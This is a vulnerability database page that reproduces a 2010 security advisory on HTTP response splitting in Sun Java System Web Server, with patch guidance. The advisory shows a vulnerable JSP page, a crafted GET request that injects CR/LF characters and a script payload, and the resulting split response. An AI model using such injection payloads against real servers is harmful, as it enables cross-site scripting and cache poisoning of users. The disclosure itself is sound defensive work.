Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Sun Java System Web Server - HTTP Response Splitting

🗓️ 21 Oct 2010 00:00:00Reported by Roberto Suggi LiveraniType 
zdt
 zdt🔗 0day.today👁 12 Views

Oracle Sun Java System Web Server HTTP Response Splitting attac

Code
===========================================================
Oracle Sun Java System Web Server - HTTP Response Splitting
===========================================================

Description
 
Security-Assessment.com discovered that is possible to successfully perform an HTTP Response Splitting attack against applications served by Sun Java System Web Server. The vulnerability can be exploited if user supplied input is used to generate the value of an HTTP header, as shown in the test.jsp page below:
 
test.jsp – Source Code
 
<html>
test
<%
response.setStatus(HttpServletResponse.SC_OK);
String ref = request.getParameter("ref");
response.setHeader("Referer",ref);
%>
 
The test.jsp page is vulnerable to HTTP response splitting when served by Sun Java System Web Server. HTTP Response Split can lead to Cross Site Scripting and browser cache poisoning attacks.
 
Exploitation
 
In this advisory, we will cover description of a Cross Site Scripting attack. The following HTTP GET contains a Cross Site Scripting payload which is included in the HTTP Header injection:
 
GET /test.jsp?ref=http://my.test.domain.com/%0D%0AContent-
type:+text/html;%0D%0A%0D%0ATEST%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
 
By inserting CR and LF characters in the “ref” HTTP parameter, it is possible to split the HTTP response from the server as shown in the following table:
 
HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 28 May 2010 12:44:55 GMT
Referer: http://my.test.domain.com/
Content-type: text/html;
TEST<script>alert(1)</script>
Content-type: text/html;charset=ISO-8859-1
Content-length: 22
<html>
test
 
 
The above example shows a JavaScript code injection in the split HTTP response. Consequently, it is possible to perform a Cross Site Scripting attack. The testing was conducted using the following settings:
* Server side: Sun-Java-System-Web-Server/7.0 Update 8 (default) installed on Windows XP SP3;
* Client side: Mozilla Firefox 3.5.8, Opera 10.10, Internet Explorer 8.
 
 
Solution
Oracle has created a fix for this vulnerability which has been included as part of Critical Patch Update Advisory - October 2010. Security-Assessment.com recommends all users of Sun Java System Web Server to upgrade to the latest version as soon as possible. For more information on the new release of patch for Sun Java System Web Server refer to the release notes:
http://sunsolve.sun.com/search/document.do?assetkey=1-79-1215353.1-1
http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html#AppendixSUNS



#  0day.today [2018-01-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Oct 2010 00:00Current
7.1High risk
Vulners AI Score7.1
java system web serverhttp response splittingcross site scriptingsecurity-assessment.comvulnerabilitypatch updatecr lf characters
12